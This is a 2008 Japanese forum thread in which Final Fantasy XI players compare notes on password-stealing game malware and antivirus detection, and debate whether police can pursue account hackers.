推測だけどブラウザのスクリプト系は全部オンのままかねやっぱ
今のは症状何も出ないのだろうか
323 名前：既にその名前は使われています：2008/08/15(金) 19:24:14 ID:5GyIwlZK: >>322
flashの脆弱が発表されてすぐ最新にしたけど感染したわ
324 名前：既にその名前は使われています：2008/08/15(金) 19:30:29 ID:ITkts8qi: 多分、対策前にやられたんじゃないのかね。

最近の動向を見るに、業者がかなり本腰を入れてパス抜きしてるしな。
325 名前：既にその名前は使われています：2008/08/15(金) 19:30:51 ID:9uXTswmp: カスペみたら
検地しましたリスクウェアInvader
ってあったんだがどうやって削除するんだ・・・助けて・・・・
326 名前：既にその名前は使われています：2008/08/15(金) 19:31:28 ID:9uXTswmp: すべて駆除するがなぜか選べない・・・・
327 名前：既にその名前は使われています：2008/08/15(金) 19:35:05 ID:JDKwDrbx: >>325
アラートの内容しっかり書かないと誰もわけわかんないよー。
328 名前：既にその名前は使われています：2008/08/15(金) 19:36:24 ID:jmS0ivW/: >>323
詳しく教えてくれないと分からんけど
それ前のfc2とか別経由だったんじゃねえの
329 名前：既にその名前は使われています：2008/08/15(金) 19:38:18 ID:9uXTswmp: >>327
検知しました: リスクウェア Invader プロセスを実行します: C:\WINDOWS\system32\svchost.exe

これでいいのかな？
330 名前：既にその名前は使われています：2008/08/15(金) 19:39:45 ID:JDKwDrbx: >>329
それがPOL起動したときにアラートでてくるのーん？
331 名前：既にその名前は使われています：2008/08/15(金) 19:42:25 ID:9uXTswmp: >>330
いやPOL起動した時にでてこないけどなんでか今カスペ見たらあったんだ
332 名前：既にその名前は使われています：2008/08/15(金) 19:42:40 ID:JDKwDrbx: >>323
それって具体的にいつ頃の話かなー。FlashPlayer更新したの。
333 名前：既にその名前は使われています：2008/08/15(金) 19:44:39 ID:JDKwDrbx: >>331
カスペルさんのログにあったってこと？
334 名前：既にその名前は使われています：2008/08/15(金) 19:44:54 ID:7I7hZCtW: >>322
Flashの最新版は一度インした後の自動アップデートでした。
インしてから１２時間後くらい。
６月末からインしてなくて、最初のインでパスを手動入力。
その後からはソフトウェアキーボードで入力。

>>317
ん～　１１系のサイト見てなくても感染しちゃうとなると、ど～して
よいやらといった心境・・・　
elemenは見たかもだけど、これが原因だとやばいもんなぁ。
あとでクリーンインストールします。
335 名前：既にその名前は使われています：2008/08/15(金) 19:45:59 ID:9uXTswmp: >>333
そうです
これはかなりやばいでしょうか？・・・
336 名前：既にその名前は使われています：2008/08/15(金) 19:46:11 ID:PntCHrPq: エレメンも危ないよ
有名所が狙われてる状況だし
337 名前：既にその名前は使われています：2008/08/15(金) 19:47:22 ID:7I7hZCtW: うわ～　そうなのかぁ・・
338 名前：既にその名前は使われています：2008/08/15(金) 19:48:42 ID:ITkts8qi: もはやどこにも安全な所はないよ。
339 名前：既にその名前は使われています：2008/08/15(金) 19:51:31 ID:JDKwDrbx: >>335
POL起動時にPOL.exeに対してsvchostが突付きにきたってんならほぼ感染確定といっていいかもだけど。
そのアラート出たときの状況も解らなければなんともいえないなー。
340 名前：既にその名前は使われています：2008/08/15(金) 19:55:18 ID:9nyfMAb9: 今垢凍結中なんですが
ビューアー起動して２垢目でちょろっと遊ぼうと思ってたら
ログインもしてないのにプレイオンラインビューアーが突然VUされますた。
こういう症状の人いませんか？
341 名前：既にその名前は使われています：2008/08/15(金) 19:57:06 ID:zL49syk2: 自動ログインになってたんじゃね
342 名前：既にその名前は使われています：2008/08/15(金) 19:57:29 ID:uyR8JDwT: >>334
6月末～最初のインの間のネット利用は？
あと「最初のイン」ってのはいつごろかな
343 名前：既にその名前は使われています：2008/08/15(金) 19:58:55 ID:oas3FWe4: POLはログイン前にVUしなかったか？
344 名前：既にその名前は使われています：2008/08/15(金) 19:59:52 ID:9uXTswmp: >>339
まじですか・・・
駆除方法もわからないといことですよね
明日クリーンインストールするか・・・
345 名前：既にその名前は使われています：2008/08/15(金) 20:00:16 ID:XPhIGcye: IDPASS間違えててもPOLのVUPは開始されるな
346 名前：340：2008/08/15(金) 20:03:08 ID:9nyfMAb9: 起動直後にいつもと違う画面でVUしますか？って感じでなって
VU終わったらメンバー登録からしなきゃない状態になりました。
寝ぼけてたんでしっかりと画面みないで押したんですが、
不思議な現象ですた。時間は午前２時頃だったと思います。
２垢目正常にインできることを確認、一応PS２でパスは変えました。
347 名前：既にその名前は使われています：2008/08/15(金) 20:04:39 ID:jWIcrhGw: 相当古いソフトの方で入れて
ウェイいいイイイイイの方がでたとかｗ
348 名前：既にその名前は使われています：2008/08/15(金) 20:08:55 ID:du3tdCCK: カスペとかNODとかフリーアンチウィルスソフト使ってて削除方法がわからんて・・・

バスターとかサポセン使えるソフト使った方がいいんじゃないの
349 名前：既にその名前は使われています：2008/08/15(金) 20:09:56 ID:7I7hZCtW: >>342
引越しでネット切れてたので８月１０日頃まで一切接続なしでした。
１１にイン(確か12日)するまでにのぞいたサイトはヤフー、朝目、pixivくらいかと思われます。

>>343
ＶＵはログイン直後でしたね。
350 名前：既にその名前は使われています：2008/08/15(金) 20:13:50 ID:INa/o3rB: 次回からこのIDとPASSでオートログインする　　っていう設定になってたら勝手にVUになるんじゃね。

その設定にした覚えが無いなら新しいウイルスの可能性もあるな
351 名前：既にその名前は使われています：2008/08/15(金) 20:36:44 ID:JDKwDrbx: >>344
それは挙動に対してのアラートだからねー。
svchostは他のサービスプログラムから呼び出されて動くわけで。
現時点の限られた情報だけではその親サービスがナニなってる可能性もあるかもねってしか言えないなー。
というか。カスペルさんでHDD全スキャンしてみた？
352 名前：既にその名前は使われています：2008/08/15(金) 20:42:50 ID:2FOBiNy3: svchostを無効にしちゃえばいいんだろうけど、どんな影響が出てくるのやら・・・
353 名前：既にその名前は使われています：2008/08/15(金) 21:04:09 ID:PXb41IGn: フレがリアルタイムでハック食らってて吹いた
354 名前：既にその名前は使われています：2008/08/15(金) 21:35:09 ID:YUY83+SR: ふう、ようやくカスペルの完全スキャンオワタ
KarnaeghDrv.dllだけじゃなくて他にもウイルスみつかた；；
今日は３つくらいセキュリティソフト入れなおして反応しなかったのになぁ
カスペルスキーって結構優秀なんですね
355 名前：既にその名前は使われています：2008/08/15(金) 21:48:27 ID:965/EE1i: 15日版のKarnaeghDrv.dllはカスペのプロセスを見つけると何かするかも。
このバージョンはlineage2をターゲットにしているようだけど、今後どうなることか。
356 名前：既にその名前は使われています：2008/08/15(金) 22:11:35 ID:1vVPkxy8: >>354
優秀すぎて2年分契約しました
2年で7940円なら安いもんだぜ
357 名前：既にその名前は使われています：2008/08/15(金) 23:21:17 ID:chx+t+9S: フォルダ見たけど、xeroxじゃなくてXEROXと大文字なんだが…。これはアウト？
ｘEROｘみたいにxが小文字ではないんだが。
358 名前：既にその名前は使われています：2008/08/15(金) 23:31:23 ID:k6XG7TrH: あのね。ファイルやフォルダを新規作成すればわかるけど
AAAAとaaaaは共存できないの。つまり大文字小文字関係ないの。
359 名前：既にその名前は使われています：2008/08/15(金) 23:31:54 ID:9Misv5h8: 体の一部がハックハック！ハックハック！
360 名前：既にその名前は使われています：2008/08/15(金) 23:36:43 ID:chx+t+9S: >>358
すいません。初心者なものでして。文字関係ないという事は、上で書かれてる様に
XPなら標準装備で心配ないという事でしょうか？

突然の指摘で焦ったもので。。
361 名前：既にその名前は使われています：2008/08/15(金) 23:55:11 ID:D2s4LUm3: ｘEROｘのｘは２バイト文字
362 名前：既にその名前は使われています：2008/08/16(土) 00:21:43 ID:zJhK+zaE: 検出率だけみるならカスペなんだろうが、総合的なセキュリティ考えるとノートンとかなんだよね。
っていうかバスターでもカスペよりは良いし・・・
カスペがもうちょっとウイルススキャン以外にも目を向けてくれたら買うんだけど・・・
あるいは親和性が高い別機能特化のソフトがあれば良いんだけど、競合するからな。
すべてのセキュリティソフトは機能別にon/offできるようにしてほしい。
363 名前：既にその名前は使われています：2008/08/16(土) 00:27:06 ID:qmwBd4Ez: >>362
この流れでなんでいきなりセキュソフトについて語ってるわけ？
セキュ板にでもいけば？
364 名前：既にその名前は使われています：2008/08/16(土) 00:31:46 ID:uLXvSjCZ: 十中八九感染したので報告。
ウィルスソフト：バスター２００８
フラッシュ：最新版
Pol起動時に不明な変更で度々ブロック。
ＦＦ中にパスを外部に送信されそうになってブロックがあった。
おかしいなと思ったことは一時期からＦＦが重くなった。
バスターではウィルス発見されず。
これからカスペのオンラインスキャンしてきます。
ウィルスソフト入れてFlashも最新版だからって安心しないほうがいい。
バスター使いは個人情報保護項目でパスを外部に漏らさないように確実に設定を。
365 名前：既にその名前は使われています：2008/08/16(土) 00:34:07 ID:+0IE4ZMs: >>360
近頃のハック関連はね。今後は判らん
ここの情報を鵜呑みにしないで調べる癖を付けとくといいぞ
366 名前：既にその名前は使われています：2008/08/16(土) 00:36:01 ID:Z/TjMW/M: >>362
FWならなおさら差が付くけど何言ってんだか。
ttp://www.matousec.com/projects/firewall-challenge/results.php
セキュ板にお帰りください。
367 名前：既にその名前は使われています：2008/08/16(土) 00:40:09 ID:+0IE4ZMs: >>364
警告したいのは判ったが情報が足りない
>>6に従って纏め直してくれ
368 名前：既にその名前は使われています：2008/08/16(土) 00:40:18 ID:4WtF2MjS: やべーなんか不安になってきた
カスペのオンラインスキャンってウィルスソフトでオフラインでスキャンするのより時間かかる？
369 名前：既にその名前は使われています：2008/08/16(土) 00:44:49 ID:Z/TjMW/M: >>368
すんげー時間かかるからスキャンして寝るがよろし。
2回目以降ならファイル情報キャッシュするから速いんだけど
オンラインスキャンじゃどうだったかなぁ。
370 名前：既にその名前は使われています：2008/08/16(土) 00:45:05 ID:+0IE4ZMs: 大差ない。つか時間を惜しんでどうする？
371 名前：既にその名前は使われています：2008/08/16(土) 00:45:16 ID:4WtF2MjS: >>369
さんくす
やってみるは
372 名前：既にその名前は使われています：2008/08/16(土) 00:46:14 ID:qqPYDUJY: ｽﾚﾁだけど中華共になんかお灸を据える方法ないの？フレが垢ハックの被害受けて引退してマジ許せん
373 名前：既にその名前は使われています：2008/08/16(土) 00:47:47 ID:Z/TjMW/M: >>372
田代と言いたいが、あぼーんされるからなぁ。
言っちゃなんだがウンコがあるからハエがたかるわけで、
RMTしない・RMTした奴を晒してハブるくらいじゃね?
374 名前：既にその名前は使われています：2008/08/16(土) 00:49:42 ID:bgfTFsLF: ゲーム内でツール使って稼ぐのと違って、垢ハックって犯罪だよね？
詳しくないからよくわからないけど、つきとめて罪に問うことってできないのかな。
375 名前：既にその名前は使われています：2008/08/16(土) 00:53:51 ID:2mkXpsKB: >>374お前に根気と金が有るなら出来る。
376 名前：既にその名前は使われています：2008/08/16(土) 00:54:35 ID:0xfyVFfs: 中国が協力する訳がない。
377 名前：既にその名前は使われています：2008/08/16(土) 00:58:22 ID:bgfTFsLF: どうやって判明させるものなん？
378 名前：既にその名前は使われています：2008/08/16(土) 01:04:45 ID:FiQFq8bK: はやくFLASH更新してくれadobe・・・・・こわくてたまらん；；
379 名前：既にその名前は使われています：2008/08/16(土) 01:05:22 ID:qWc24VrS: たかがゲームでこんなにびくびくさせられるとはなｗ
380 名前：既にその名前は使われています：2008/08/16(土) 01:22:13 ID:zJhK+zaE: >>366
他にも機能があるだろうに・・・
FWとスキャンしか知らないんだな・・・
スキャン一つとっても比較対象は単純な検出能力だけじゃないよ。
381 名前：既にその名前は使われています：2008/08/16(土) 01:24:12 ID:bgfTFsLF: どうするのか純粋に知りたかっただけなんだけど、
書いちゃまずいことなんかな
382 名前：既にその名前は使われています：2008/08/16(土) 01:26:20 ID:+mDqdjWk: >>380
このスレに限っては特定のウイルスの検出能力が一番物を言うんだよ。
一般的なセキュリティよりも、ゲームのパス抜きウイルスに対しての
性能のほうが重要視される。
で、バスターは論外。>>111も>>292も見つけられない
383 名前：既にその名前は使われています：2008/08/16(土) 01:27:44 ID:Z/TjMW/M: だめだこいつ
384 名前：既にその名前は使われています：2008/08/16(土) 01:29:58 ID:1IhTMKAF: >>380
セキュリティソフトには得手不得手があるわけだが、現時点でFFの垢パクの手法に対して総合的にカスペルさんが都合がいいってだけだろ。
何をそんなにこだわってんの？すきなのつかえばいいじゃんｗ
385 名前：既にその名前は使われています：2008/08/16(土) 01:30:02 ID:Z/TjMW/M: >>382
フォローすると初代(今月2日くらいの奴)は
ノートンよりバスターのが早かった。
その後のは全然だめだが(検体送ってんだぜ?)。
386 名前：既にその名前は使われています：2008/08/16(土) 01:30:04 ID:+mDqdjWk: >>381
たとえこっちの警察を動かすことができたとしても、相手が中国国内にいた場合は、
中国が日本からの捜査要請に絶対に協力してくれないからその時点でどうしようもない
ハッキング被害で警察に届け出た人は必ず言われるよ
387 名前：既にその名前は使われています：2008/08/16(土) 01:32:35 ID:U22SFD1Y: ハックって□e的にはすぐ見つけれないのかな？
ログたどれるわけだし、被害者のお金の送金先位わからないのかな？
388 名前：既にその名前は使われています：2008/08/16(土) 01:34:51 ID:4WtF2MjS: 黒幕は

ヤス
389 名前：既にその名前は使われています：2008/08/16(土) 01:36:40 ID:bgfTFsLF: >>386
レスありがと。
相手が中国にいた場合は、実際に逮捕したりするのはあっちの国で～って言うのはわかるんだけど、
それまでの過程が知りたかったんだよね。
IPのこととか接続に関することはとかさっぱりわからないからさ、どこまでが日本でわかる情報なのかとか。
「ここまでわかってるから後の捜査は頼むよ」って言うのか、
「突き止めたらおたくの国だったから逮捕よろしく」って言えるぐらいわかるのか。
390 名前：既にその名前は使われています：2008/08/16(土) 01:37:07 ID:BfIGi5kh: バスター使いはとりあえずカスペオンラインスキャン使っておけ、今すぐに。
391 名前：既にその名前は使われています：2008/08/16(土) 01:39:01 ID:zJhK+zaE: >>382
だから？
それを否定する気もないし、論点が分かってないだろ・・・

>>384
そういう話をしてるだけ。
別にカスペを否定してるわけじゃないんだが・・・
頭の悪い奴は自分が信奉するものにすこしでもケチが付くと顔真っ赤にするな～ってことだろう。
FFのこと「だけ」考えてカスペ導入するようなら、FF専用機にでもした方が良いんじゃないの？
このスレに来てるとしても、殆どの人はFF以外の使用率の方が高いと思うんだが。
392 名前：既にその名前は使われています：2008/08/16(土) 01:40:13 ID:EF/pY4FE: http://changi.2ch.net/test/read.cgi/ogame/1216987350/964-965
あっちのスレだとあまり反応がなかったけど、
これってもうどうにもならんていうことだよね？
393 名前：既にその名前は使われています：2008/08/16(土) 01:40:46 ID:Z/TjMW/M: と、顔真っ赤にした頭の悪いノートン信者でした。
394 名前：既にその名前は使われています：2008/08/16(土) 01:42:08 ID:+mDqdjWk: >>389
実際に警察に行ったけど、警察がスクエニに要請して、該当アカウントに接続した
IP記録を取り寄せて調べてもらうことまではできる。
で、ハック犯と思しき接続元が中国IPだったら「もうこれ以上の追及はできませんねー」で打ち切られる
表現は悪いが相手が中国だと分かると最初からあきらめてる感じかな。
もちろん警察はやれるところまでやってくれたんだけど
395 名前：既にその名前は使われています：2008/08/16(土) 01:44:17 ID:G9falose: >>394
業者必死だな
中国からのIPは弾かれる様になったんだよ嘘付野郎
396 名前：既にその名前は使われています：2008/08/16(土) 01:45:07 ID:BfIGi5kh: >>395
ｋｗｓｋ
397 名前： ◆vddkNh7Yho ：2008/08/16(土) 01:47:29 ID:+mDqdjWk: >>395
どうも、去年10月に被害に遭って警察に行った報告者です。
特定の国からのアクセスを弾くようになったのはいつからでしたっけ？
398 名前：既にその名前は使われています：2008/08/16(土) 01:48:06 ID:Z/TjMW/M: >>394
一応前例はあるんだがなぁ。
ttp://ascii24.com/news/i/topi/article/2006/02/11/660504-001.html

>>396
ttp://www.playonline.com/ff11/polnews/news13755.shtml
399 名前：既にその名前は使われています：2008/08/16(土) 01:49:46 ID:1IhTMKAF: >>391
このスレでは一般的な用途で使用＋FF11ﾌﾟﾚｲの環境の人が多いんだと思うが。
その場合でもカスペルさんを真っ当に使えばそれほど問題があるとも思えないしなあ。
そりゃ上っていうか超強度目指したらカスペルさんとかでは厳しいものがあるし、それこそある程度以上のOSに対する知識も必要になってくるわけで。
俺はみんながカスペルさんが使おうと問題だとは思わないけどなｗ
むしろ何も解らないままｃｆｐやらそこらへん使うほうがよっぽど怖いと思うわｗ
400 名前：既にその名前は使われています：2008/08/16(土) 01:49:52 ID:G9falose: 日本国内のIPまたはGFEのIPでしかログインはできない。ちなみにＦＦ１１が遊べる国は日本からの要請で逮捕もしてくれる協定が結んである。
垢ハック自体は中国だろうが盗んだパスは日本の中華学生がネカフェからログインしてるんだろうな
401 名前：既にその名前は使われています：2008/08/16(土) 01:50:04 ID:bgfTFsLF: >>394
詳しくありがとう。
MMOとかやらない人から見たらうちらが失うのは「たかがゲームのデータ」だけど、
その結果大量の日本円が海外に流出してること、もっと大事に受け止めてほしいね
402 名前：既にその名前は使われています：2008/08/16(土) 01:50:08 ID:zJhK+zaE: >>393
機能別の細かい動きも知らない無知は黙ってろって。
だめなのも信者なのもお前のほうだろ？

ちなみに機能評価のためにメジャーな製品は殆ど持ってるが、
ノートンは一番欲しい機能がないから使ってないよ。
妄想が激しい信者は手に負えないね。
403 名前：既にその名前は使われています：2008/08/16(土) 01:50:13 ID:0TDZDaBV: セキュリティソフトは、使いこなせなければなに入れてても同じ
カスペルスキーの検出力は確かにすごいけど、その半面で誤検出も多い
それに対応できなければ、カスペルスキーを使うのは避けたほうがいいと思うし
誤検出を避けて検出レベルを抑えれば、結局はほかのソフトと変わりがない
まぁ、なに使っててもウィルスには感染するわけで、セキュリティソフトがなにが
いいかを問題にするよりは、ウィルスに感染しない状況を自分で模索するほうが
先決だと思いますよ
404 名前：既にその名前は使われています：2008/08/16(土) 01:50:54 ID:BfIGi5kh: >>398

>一部接続元からのプレイオンラインへのログイン制限を行います。
って書いてあるんだけど、具体的にｋｗｓｋ
405 名前：既にその名前は使われています：2008/08/16(土) 01:52:57 ID:5AJxP9YE: 業者が日本でアパートかりて串パクって操作してる可能性もあるよね
まあどっちにしろ日本国内からアクセスしてたら逮捕はされると思うけど。
ちなみに君らが通報しない限り逮捕はされませんからね
406 名前：既にその名前は使われています：2008/08/16(土) 01:55:05 ID:zJhK+zaE: >>399
うん。
だからカスペを使うのが問題だなんて言ってない。
個人的には不満があるのでわざわざ購入しないってだけで。
好きなの使えばいいと思うし、俺に反論してるのは何が不満なんだか・・・
407 名前：既にその名前は使われています：2008/08/16(土) 01:56:08 ID:Z/TjMW/M: >>402
バスターとか言ってる時点でお里が知れるからセキュ板に帰れよ…。
408 名前：既にその名前は使われています：2008/08/16(土) 02:01:33 ID:zJhK+zaE: 妄想クンはしつこいね
409 名前：既にその名前は使われています：2008/08/16(土) 02:02:31 ID:Zv41p5kd: ■アカウントハックされた奴は最寄の警察に行って被害届けを出そう！
　不正アクセスに増加に伴い親身になって対応してくれるようになったぞ！

※最近業者が行っても無駄だの馬鹿にされるだの
　逮捕されないために必死になってるので注意！

警察の窓口に行き「不正アクセスの被害を受けました」と伝えれば話がスムーズに進みます。

■各都道府県警では既に不正アクセスに関する専門の対策室ができております
　泣き寝入りは絶対ダメ！お気軽にご相談を。
　http://www.npa.go.jp/cyber/localpolice/index.html
■警察庁サイバー対策室
　http://www.npa.go.jp/cyber/
410 名前：既にその名前は使われています：2008/08/16(土) 02:02:56 ID:DCyxkI7n: いちいち煽る奴ってなんなの？ｗ
411 名前：既にその名前は使われています：2008/08/16(土) 02:03:14 ID:0TDZDaBV: 日本国内に中国サーバが置かれて、それが摘発された事件があったのは
何年前になるでしょうか
確か、摘発されたのは福岡だったはず

６年前くらいかな
412 名前：既にその名前は使われています：2008/08/16(土) 02:04:01 ID:+mDqdjWk: >>409
だから昨日も言ったけどせめてあらかじめ電話くらいしなさいってばｗ
413 名前：既にその名前は使われています：2008/08/16(土) 02:05:48 ID:Zv41p5kd: ■不正アクセスによる罰則

「他人のＩＤ・パスワード等」を盗用してアクセス制御されているコンピュータを電気通信回線を通じて不正に利用する行為（法第３条）
１年以下の懲役又は５０万円以下の罰金（法第８条）

電気通信回線を通じて、アクセス制御されているコンピュータ等のセキュリティホールを突いて、アクセス制御されているコンピュータを不正に利用する行為（法第３条）
１年以下の懲役又は５０万円以下の罰金（法第８条）

アクセス制御されているコンピュータを利用できる「他人のＩＤ・パスワード等」を、承諾なしに第三者に提供する行為（法第４条）
３０万円以下の罰金（法第９条）
414 名前：既にその名前は使われています：2008/08/16(土) 02:06:19 ID:bBKtzxt9: zJhK+zaEの言ってる事も間違いじゃないがまあ、興奮するな
大手のアンチウィルスはこの手の特殊なウィルス（ＭＭＯユーザーのみが対象etc）に余り力を入れないのはしょうがないし

カスペみたいなソフトはそういうところもカバーしないと売れないわけで
ただ、バスターがダメでカスペが最高！てのはちょっと違うと思うがな
まあ、双方モチツケ
415 名前：既にその名前は使われています：2008/08/16(土) 02:07:10 ID:NUFL/SWx: >>405
そうなんだよな。
恥ずかしいし冷めたとかﾏﾝﾄﾞｸｾとかで警察へ申請しない奴が居るんだよな。

今自由にさせておいたら盗んだ汚い金で良い人材を雇われたり、
機材を購入されて身の危険が及ぶような犯罪も激化してしまうんだろうな。
416 名前：既にその名前は使われています：2008/08/16(土) 02:07:32 ID:L6zUHjs6: ここに通報の仕方が載ってるから自分の住んでる都道府県警をクリックすればいい

http://www.npa.go.jp/cyber/localpolice/index.html
417 名前：既にその名前は使われています：2008/08/16(土) 02:07:34 ID:0TDZDaBV: >>413
「日本国内で犯罪が立証された場合」を付け加えないとだめですよ
中国からの不正アクセスには適用されません
418 名前：既にその名前は使われています：2008/08/16(土) 02:08:10 ID:BfIGi5kh: >>414
>バスターがダメでカスペが最高！
たしかにこれはあり得ないけど、
バスターで検知できないのがカスペで検知できるってのは重要な情報だと思うよ。
419 名前：既にその名前は使われています：2008/08/16(土) 02:09:19 ID:f28q3JYw: >>292のやつがまた更新されたみたい
ttp://www.virustotal.com/analisis/0027adc64f9e3105ed91f5abbf96fc1c
マメだねえ
420 名前：既にその名前は使われています：2008/08/16(土) 02:09:38 ID:ThwopqzB: >>417
中国、台湾、香港からはPOLに繋ぐことができない
あとはわかるな？
421 名前：既にその名前は使われています：2008/08/16(土) 02:11:26 ID:Z/TjMW/M: >>419
AntiVirとOneCareとNortonか…割とバラけるなぁ。
VBA32がずーっと捕獲してるな(ヒューリスティックだけど)。
422 名前：既にその名前は使われています：2008/08/16(土) 02:11:41 ID:0TDZDaBV: >>420
わかっても処罰する権限がないのです
わかりますか？
423 名前：既にその名前は使われています：2008/08/16(土) 02:12:52 ID:RataSGFf: >>422
業者必死ですね（笑）
日本語でお願いします（笑）
【わかりますか】？（笑）
424 名前：既にその名前は使われています：2008/08/16(土) 02:13:21 ID:BfIGi5kh: >>420
>中国、台湾、香港からはPOLに繋ぐことができない

無知な俺に教えてくれ。ソースはどこ？
425 名前：既にその名前は使われています：2008/08/16(土) 02:13:42 ID:8fM/asSf: >>420
でも全部遮断されてるのか？
それらの国からの接続の例があるんだけど。
フレが日本語の出来る香港人だけど普通に接続してるし。
426 名前：既にその名前は使われています：2008/08/16(土) 02:13:45 ID:0TDZDaBV: サイバー犯罪条約を知らない人がまだこのスレにもいますか
かなり前に出しましたが
427 名前：既にその名前は使われています：2008/08/16(土) 02:15:59 ID:+mDqdjWk: 揚げ足取りになるけど、どの地域の接続を制限したっていう明言はされてないんだよね
それに業者が制限で一網打尽になったかというと普通に今たくさんログインしてるしなー
428 名前：既にその名前は使われています：2008/08/16(土) 02:17:29 ID:BfIGi5kh: ブロックしてる接続元を公開してるの？
429 名前：既にその名前は使われています：2008/08/16(土) 02:19:09 ID:0TDZDaBV: ３回目、張っておきます

サイバー犯罪条約
ttp://www.mofa.go.jp/mofaj/gaiko/treaty/treaty159_4.html
430 名前：既にその名前は使われています：2008/08/16(土) 02:20:03 ID:Z/TjMW/M: 地域丸ごとではなく、ハックした奴のIPをその都度denyしてんのかねぇ。
そりゃ終わらんわｗ
431 名前：既にその名前は使われています：2008/08/16(土) 02:20:15 ID:Fcgb3PM0: パス抜かれた
432 名前：既にその名前は使われています：2008/08/16(土) 02:39:26 ID:+0IE4ZMs: >>429
法について言いたいことは良く判った

「アカハックされたら警察に行くべきである」
これを肯定するのか否定するのかを教えてくれ

どうも否定してる様にしか見えん
433 名前：既にその名前は使われています：2008/08/16(土) 02:39:56 ID:BfIGi5kh: なんだｗ
業者は、３国の接続元を遮断されてるって思い込ませたいだけかｗ
434 名前：既にその名前は使われています：2008/08/16(土) 02:40:45 ID:0TDZDaBV: 中国からの不正アクセスに関して、いまのところ日本国内からそれを処罰する
方策はなにもありません
このスレでそれを話題にはしないでください

★「巻き戻し情報」「スクエニに法的責任を！」「誰が悪いかランキング」「被害者の会を作れ」などは別スレでお願いします。
　　別スレ　●● FF11垢ハック巻き戻し状況報告スレ ●●　http://changi.2ch.net/test/read.cgi/ogame/1216987350/

テンプレにも書きましたが、その話題は別スレでお願いします
435 名前：既にその名前は使われています：2008/08/16(土) 02:42:02 ID:fOwzhYdy: >>432

ここの※の所をよく読んでください

■アカウントハックされた奴は最寄の警察に行って被害届けを出そう！
　不正アクセスに増加に伴い親身になって対応してくれるようになったぞ！

※最近業者が行っても無駄だの馬鹿にされるだの
　逮捕されないために必死になってるので注意！

警察の窓口に行き「不正アクセスの被害を受けました」と伝えれば話がスムーズに進みます。

■各都道府県警では既に不正アクセスに関する専門の対策室ができております
　泣き寝入りは絶対ダメ！お気軽にご相談を。
　http://www.npa.go.jp/cyber/localpolice/index.html
■警察庁サイバー対策室
　http://www.npa.go.jp/cyber/
436 名前：既にその名前は使われています：2008/08/16(土) 02:43:03 ID:0TDZDaBV: >>432
ご自身の問題ですから、わたしから言うべきことはなにもありません
わたしだったら、迷うことなく警察に被害届けを出します
437 名前：既にその名前は使われています：2008/08/16(土) 02:44:11 ID:G2f7xbne: >>434
ここで話すべき事だと思うが？
あっ業者さんでしたかｗ深夜までご苦労様ですｗ
438 名前：既にその名前は使われています：2008/08/16(土) 02:47:52 ID:+0IE4ZMs: すまないが、その書き方は納得がいかない。

貴方がテンプレを書いた確証も無ければテンプレに従って議論してる保障も無い。
もちろん、貴方に言われるままにこちらが行動するすることもない。
439 名前：既にその名前は使われています：2008/08/16(土) 02:52:23 ID:0TDZDaBV: >>438
実際にこのスレを立てたのはわたしではありません
立てられないので、前スレでテンプレを出して立てていただきました
行動云々については、議論を避けます
440 名前：既にその名前は使われています：2008/08/16(土) 02:53:43 ID:+0IE4ZMs: >>436
ごめんなさい、同じIDかと思った。
肯定ですね。わかりました。
441 名前：既にその名前は使われています：2008/08/16(土) 02:55:40 ID:HR6gj8Vi: >>429
で、そのサイバー犯罪条約とやらは、中国は批准してるのかね？
442 名前：既にその名前は使われています：2008/08/16(土) 03:05:57 ID:eTSO6jRB: FFXIAHってさ、ads.ffxiah.comをhostsファイルで禁止にしとけばだいたいいいかな？
443 名前：既にその名前は使われています：2008/08/16(土) 04:13:27 ID:nFub+C0P: >>442
はい
444 名前：既にその名前は使われています：2008/08/16(土) 05:12:31 ID:f+OoKNna: 鑑定スレを見に行ったら、PG2のMMORPGトロイリストが反応して送信ブロックしたんですが・・・
（2回見に行って2回とも反応したので鑑定スレに間違いないかと）
これって何が反応してるんだろう・・・どなたか分かる人いますか(´Д｀；)ヾ
鑑定スレって危険なんでしょか？　壺使ってるから画像とか読み込んじゃうからかな・・；
445 名前：既にその名前は使われています：2008/08/16(土) 05:24:00 ID:1Qzgm2CV: >>444
janeとPG2では反応なし
jpg偽装のウイルスとかも鑑定されてるみたいだから、壺で画像を先に読み込むように
してるなら、危険だからやめたほうがいいと思う
446 名前：既にその名前は使われています：2008/08/16(土) 05:28:16 ID:vFr7+krQ: >>444
どこの鑑定スレか知りませんが、鑑定してもらうスレなので、
対策せず下手に見に行かないほうが良いと思います。

※PG2が反応したのであれば大丈夫かと思いますが。
447 名前：既にその名前は使われています：2008/08/16(土) 05:29:59 ID:f+OoKNna: そうでしたか・・・。あわててスレ閉じた時に、画像がちらりと見えていました。迂闊でした。
レスありがとうございます。
できれば次スレ立てる時に、1のテンプレ部分にそういう注意書きも載せて貰えると助かるかもです。URLの鑑定だけかと思っていましたのでOrz
448 名前：既にその名前は使われています：2008/08/16(土) 05:30:53 ID:f+OoKNna: 見たのはこの1の末尾にある鑑定スレ18です。
449 名前：既にその名前は使われています：2008/08/16(土) 05:35:31 ID:EaYAjUTE: 寝てる間にカスペルが反応してたから何かと思ったら
復元ポイントにTrojan-GameThief.Win32.OnLineGames.biuvがあった、、、、
しつこいなコイツ、、、主要なデータのバックアップ終わらなくて
クリーンインストールすぐにできないのがつらい＠＠
450 名前：既にその名前は使われています：2008/08/16(土) 05:39:17 ID:XPyKeBG1: 「ハッカー攻撃の技術ない」米議員の被害指摘に中国
2008.6.13 00:37

　中国外務省の秦剛副報道局長は１２日の定例記者会見で、
米下院議員が中国国内からとみられるハッカー攻撃を受けたと指摘した問題について、
「まさか発展途上国の中国がそうした高等技術を持っていると思っているのか。
私はまったく信じない」と述べ、強い不快感を表明

MSN産経ニュース
ttp://sankei.jp.msn.com/world/china/080613/chn0806130037001-n1.htm
451 名前：既にその名前は使われています：2008/08/16(土) 05:45:30 ID:XPyKeBG1: こんな国にまともな対応を求めるのは無理すぎだわ。
何でPCでゲームしたいだけなのに、こんな奴らを相手に苦労しなきゃいけないのやら。
452 名前：既にその名前は使われています：2008/08/16(土) 05:46:06 ID:JRl18vdP: >>450
なんつーかほんと政府頭わりーな。
453 名前：既にその名前は使われています：2008/08/16(土) 05:48:31 ID:0TDZDaBV: 専ブラの「画像を先に読み込む」のは、設定で変更できますか？
専ブラを使ってないので教えてくださいm(_ _)m
454 名前：既にその名前は使われています：2008/08/16(土) 05:48:38 ID:+S+ESvg2: 噂のKarnaeghDrv.dllで感染が発覚したのですが、どうやって消せばいいんでしょうか（´Д⊂）
該当するフォルダにいって検索しても見つからないんですが・・・
